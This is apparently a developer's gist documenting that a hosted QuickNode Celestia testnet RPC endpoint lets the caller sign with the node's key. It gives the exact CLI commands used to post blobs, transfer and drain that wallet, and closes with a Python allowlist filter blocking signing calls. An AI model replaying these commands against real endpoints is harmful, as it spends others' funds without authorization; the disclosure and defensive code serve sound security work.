@jcstein
Created March 12, 2025 18:10
playing around with quicknode endpoint and DA node
  1. tried to submit a blob to the quicknode URL, which errors as expected bc no node store specified to get the auth token
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/
Error: cant access the auth token: token/node-store flag was not specified: no opened Node Store found (no node is running)
Usage:
  celestia blob submit [namespace] [blobData] [flags]
...
  1. query (what I thought was my) account address balance, account not found bc it isn't funded. I thought it was mine originally and didn't check the address against my keystore.
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4

{
  "result": "querying account my_celes_key: rpc error: code = NotFound desc = account celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw not found"
}
  1. then I mistakenly copied the quicknode mocha address from log above as the signer here
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": "querying account my_celes_key: rpc error: code = NotFound desc = account celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw not found"
}
  1. then I funded the account, checked the balance of my local key, it was still zero, weird (hadn't realized I funded the quicknode key yet)
celestia state balance --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "0"
  }
}
  1. then I spent from quicknode's wallet that I had funded, without accessing the node's keys:
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129364,
    "commitments": [
      "0xa9ab91516d6413ad9889c5dd596670c0206ae12314edf07b6dff5da5b97e1eda"
    ]
  }
}

I don't have this signer in my keyring, my keyring has celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy and not celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw. See blobtx on Celenium: https://mocha.celenium.io/tx/b143f20e7721d2666c9080a0a9c9f95134ad5d589d612590766783061c5bf8f6?tab=messages

Then I check the balance of my node bc I'm confused how I posted a blob lol -- still zero

celestia state balance --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "0"
  }
}

Then I check balance of quicknode address:

celestia state balance-for-address celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "99999648"
  }
}

submit another blob

celestia blob submit 0x6D6F76657465737431 'youve been hacked' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129439,
    "commitments": [
      "0x118a55deab58e88da73b0bb1147bff5a97d178ec7be79422073a0f6e697fd088"
    ]
  }
}

check that balance goes down

celestia state balance-for-address celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "99999472"
  }
}
  1. at this point I realize the quicknode endpoint doesn't have any protection on it and transfer funds back out as demo:
celestia state transfer celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy 100000 \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129688,
    "txhash": "E860CF445BF0D261555C7509897D5E909E0B6776299EC40278A8162B73F2AEAF",
    "logs": null,
    "events": null
  }
}

which can be found at: https://mocha.celenium.io/tx/e860cf445bf0d261555c7509897d5e909e0b6776299ec40278a8162b73f2aeaf?tab=messages

where I sent from the FromAddress when I shouldn't have been able to:

    "FromAddress": "celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw",
    "ToAddress": "celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy"

then drained the wallet

https://mocha.celenium.io/tx/84407abc5a139b4dbf3ab7bc57ddca0789e916af84a98ba14fb45f1bb69d5bec?tab=messages
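
One way a hosted gateway could stop API-key holders from spending the node's own funds is to screen each JSON-RPC body in front of the node and pass only read-only calls. This is an added example, not code from this gist, QuickNode or celestia-node. The JSON-RPC method names are assumed equivalents of the CLI commands used above, and `screen_rpc_body` is a hypothetical helper.

```python
import json

# Assumed JSON-RPC names for the CLI commands on this page; adjust to the
# node's actual API. Anything not listed is denied (default deny), which
# covers signing calls such as blob.Submit and state.Transfer.
READ_ONLY_METHODS = frozenset({
    "state.Balance",            # celestia state balance
    "state.BalanceForAddress",  # celestia state balance-for-address
    "blob.Get",
    "header.NetworkHead",
})


def screen_rpc_body(body: bytes):
    """Return (allowed, denied_methods) for one HTTP request body.

    A batch (JSON array) is allowed only if every call in it is allowed,
    so a signing call cannot hide behind a read-only one.
    """
    try:
        payload = json.loads(body)
    except (ValueError, UnicodeDecodeError):
        return False, ["<unparseable>"]

    calls = payload if isinstance(payload, list) else [payload]
    if not calls:
        return False, ["<empty batch>"]

    denied = []
    for call in calls:
        method = call.get("method") if isinstance(call, dict) else None
        if not isinstance(method, str):
            denied.append("<missing method>")
        elif method not in READ_ONLY_METHODS:
            denied.append(method)
    return (not denied), denied


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "balance": b'{"jsonrpc":"2.0","id":1,"method":"state.Balance","params":[]}',
    "submit": b'{"jsonrpc":"2.0","id":2,"method":"blob.Submit","params":[]}',
    "batch": b'[{"jsonrpc":"2.0","id":3,"method":"state.Balance","params":[]},'
             b'{"jsonrpc":"2.0","id":4,"method":"state.Transfer","params":[]}]',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, screen_rpc_body(body))
```

A gateway would return an HTTP 403 or a JSON-RPC error for any body where the first element is `False`, and log the denied method names alongside the API key that sent them.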
